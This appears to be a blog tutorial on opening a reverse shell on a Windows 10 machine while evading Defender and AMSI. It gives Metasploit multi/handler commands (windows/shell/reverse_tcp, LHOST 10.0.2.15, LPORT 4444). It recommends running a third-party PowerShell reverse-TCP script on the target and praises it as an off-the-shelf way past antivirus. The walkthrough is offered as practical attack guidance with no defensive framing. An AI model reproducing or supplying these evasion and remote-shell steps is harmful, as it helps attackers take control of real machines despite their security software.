Most of the standard off the shelf packages that generate payloads on Kali Linux are useless against the latest Windows 10 Defender (as of writing it is December 2020). I was able to generate payloads that could get around the virus checks, but the problem is wen executing. Windows AMSI (Anti Malware Scan Interface) will recognize and kill the file.
After a lot of hunting around I found this
This is a collection of power shell scripts that will open a reverse_tcp connection. So far it’s the only thing I have managed to make work on the latest Windows 10 defender, and it defeats AMSI.
So go ahead and start up metasploit on your linux machine
and then we will use our multi handler with a windows shell.
msf6 exploit(multi/handler) > set payload windows/shell/reverse_tcp
and set the LHOST and LPORT parameters before starting the listener.
msf6 exploit(multi/handler) > set LHOST 10.0.2.15 msf6 exploit(multi/handler) > set LPORT 4444 msf6 exploit(multi/handler) > exploit
Now we will go to our windows machine and run one of the powershell_reverse_tcp.ps1 script from Ivan Sincek.
You will see that it runs successfully without any warnings despite windows defender being turned on.
On out linux machine we now have a full powershell
The script from Ivan is really excellent, and after many hours trying its of different payloads, editing payloads and so on, this was the best results I got, and it’s just “off the shelf” solution!